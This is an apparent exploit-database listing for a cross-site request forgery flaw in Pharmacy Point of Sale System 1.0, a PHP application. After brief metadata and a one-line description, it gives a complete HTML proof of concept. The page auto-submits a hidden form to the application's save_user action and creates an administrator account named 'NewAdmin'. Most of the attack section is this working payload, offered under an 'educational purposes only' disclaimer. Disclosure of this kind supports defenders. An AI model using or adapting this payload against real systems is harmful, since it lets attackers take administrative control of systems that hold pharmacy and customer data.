Pharmacy point of sale system 1.0 add new user crosssite request forgery (csrf) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-10-13 | Type : webapps | Platform : php
This exploit / vulnerability Pharmacy point of sale system 1.0 add new user crosssite request forgery (csrf) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
# Date: 10/11/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
# Version: 1
# Tested on: Windows 10

Detail:
The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using crafted post request.

CSRF PoC:

--------------------------------------------------------------------------------------

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="Mrt" />
<input type="hidden" name="username" value="NewAdmin" />
<input type="hidden" name="type" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

--------------------------------------------------------------------------------------